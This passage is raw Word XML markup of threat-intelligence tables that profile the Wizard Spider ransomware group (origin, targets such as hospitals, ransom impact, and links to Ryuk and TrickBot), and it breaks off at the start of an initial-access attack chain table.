            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B6B2776" w14:textId="77777777" w:rsidR="00392096" w:rsidRPr="00387DCC" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004430D6" w:rsidRPr="00B857D7" w14:paraId="7B39D2D3" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AA49BC5" w14:textId="77777777" w:rsidR="004430D6" w:rsidRDefault="004430D6" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17F8D320" w14:textId="30A6B2E7" w:rsidR="004430D6" w:rsidRDefault="004430D6" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Wizard Spider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FC81E29" w14:textId="77777777" w:rsidR="004430D6" w:rsidRPr="00387DCC" w:rsidRDefault="004430D6" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00392096" w:rsidRPr="00B857D7" w14:paraId="5E37DCCE" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2043C90B" w14:textId="77777777" w:rsidR="00392096" w:rsidRPr="007328DE" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6384697C" w14:textId="77777777" w:rsidR="00392096" w:rsidRPr="007328DE" w:rsidRDefault="00392096" w:rsidP="00DE5441">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69CFA69E" w14:textId="77777777" w:rsidR="00392096" w:rsidRPr="00387DCC" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00392096" w:rsidRPr="00B857D7" w14:paraId="1E49E8C5" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="201EA9C6" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5363C9B9" w14:textId="6DAAED99" w:rsidR="00392096" w:rsidRPr="007328DE" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="363EB246" w14:textId="0BA0A6F1" w:rsidR="00392096" w:rsidRPr="00387DCC" w:rsidRDefault="00BE663F" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00BE663F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">WIZARD SPIDER is a sophisticated </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE663F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>eCrime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE663F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> group that has been operating the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE663F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ryuk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE663F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER. This actor is a Russia-based criminal group known for the operation of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE663F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TrickBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE663F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> banking malware that </w:t>
            </w:r>
            <w:r w:rsidRPr="00BE663F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>had focused primarily on wire fraud in the past</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00392096" w:rsidRPr="00B857D7" w14:paraId="6CEF015E" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14739008" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30693ACE" w14:textId="394B8231" w:rsidR="00392096" w:rsidRDefault="00A007D0" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08CFAB49" w14:textId="77777777" w:rsidR="00A007D0" w:rsidRPr="00A007D0" w:rsidRDefault="00A007D0" w:rsidP="00A007D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[4] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A007D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A007D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SystemBC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A007D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> victim</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21EAC013" w14:textId="77777777" w:rsidR="00A007D0" w:rsidRPr="00A007D0" w:rsidRDefault="00A007D0" w:rsidP="00A007D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A007D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>data shows Wizard Spider threat actors mostly targeted Russia 20.5% and the United States</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5001B7A4" w14:textId="785308D4" w:rsidR="00392096" w:rsidRPr="00387DCC" w:rsidRDefault="00A007D0" w:rsidP="00A007D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A007D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>12.9%.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (MITRE ATT&amp;CK presence indicates US attack significance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00392096" w:rsidRPr="00B857D7" w14:paraId="0741AAD3" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2814577B" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F6CC58D" w14:textId="5C045176" w:rsidR="00392096" w:rsidRDefault="00B210F8" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>H</w:t>
            </w:r>
            <w:r w:rsidRPr="00B210F8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>ospital</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10B7A4EB" w14:textId="77777777" w:rsidR="00B210F8" w:rsidRPr="00B210F8" w:rsidRDefault="00B210F8" w:rsidP="00B210F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[4] </w:t>
            </w:r>
            <w:r w:rsidRPr="00B210F8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>These victims include</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="703E72DB" w14:textId="77777777" w:rsidR="00B210F8" w:rsidRPr="00B210F8" w:rsidRDefault="00B210F8" w:rsidP="00B210F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B210F8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B210F8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> and aerospace companies, food producers, supply chain providers, hospitals,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE39114" w14:textId="26C93133" w:rsidR="00392096" w:rsidRPr="00387DCC" w:rsidRDefault="00B210F8" w:rsidP="00B210F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B210F8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>government agencies, and critical infrastructure providers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00392096" w:rsidRPr="00B857D7" w14:paraId="75D032C0" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D430C2F" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="550BCDED" w14:textId="77777777" w:rsidR="00C91E03" w:rsidRDefault="00C91E03" w:rsidP="00C91E03">
            <w:r>
              <w:t>Damage (integrity and availability)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1037555F" w14:textId="01BC0661" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E3C3C07" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00BE663F" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Ransom (see Attack Origin above)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D2DF60" w14:textId="0607740A" w:rsidR="00557327" w:rsidRDefault="00557327" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00557327">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Based on observed transactions to known </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00557327">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ryuk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00557327">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> BTC addresses, the ransom demand varies significantly. This suggests that WIZARD SPIDER (like INDRIK SPIDER with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00557327">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>BitPaymer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00557327">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>) calculates the ransom amount based on the size and value of the victim organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00392096" w:rsidRPr="00B857D7" w14:paraId="06EFD329" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F37D786" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C541F8D" w14:textId="5169EDFB" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="324B1EF8" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00392096" w:rsidRPr="00B857D7" w14:paraId="0FB1B3A6" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39846ED0" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="289BEDC4" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00FD47A2" w14:textId="40D1EDCE" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00740ADA" w:rsidRPr="00B857D7" w14:paraId="23C1C1B6" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="740CDD96" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C9DC246" w14:textId="07A335B1" w:rsidR="00740ADA" w:rsidRDefault="00A638D3" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B32B7CB" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00740ADA" w:rsidRPr="00B857D7" w14:paraId="172B81B2" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B312A39" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="082DB503" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C85E192" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00392096" w:rsidRPr="00B857D7" w14:paraId="2E4D2769" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F4597B6" w14:textId="0BB831F9" w:rsidR="00392096" w:rsidRDefault="00740ADA" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BD9ED22" w14:textId="217112F7" w:rsidR="00392096" w:rsidRDefault="00C55926" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r w:rsidR="0008450A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="126B028A" w14:textId="0E5206F6" w:rsidR="00392096" w:rsidRDefault="0008450A" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[4] Section 4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="142"/>
    </w:tbl>
    <w:p w14:paraId="60EDBCF9" w14:textId="77777777" w:rsidR="00392096" w:rsidRPr="00AC7A85" w:rsidRDefault="00392096" w:rsidP="00392096"/>
    <w:p w14:paraId="1B778C24" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00392096">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9918" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="441"/>
        <w:gridCol w:w="1485"/>
        <w:gridCol w:w="2964"/>
        <w:gridCol w:w="644"/>
        <w:gridCol w:w="629"/>
        <w:gridCol w:w="558"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2205"/>
      </w:tblGrid>
      <w:tr w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w14:paraId="2E6B6691" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5447FD9F" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="143" w:name="OLE_LINK11"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="68D98D9B" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
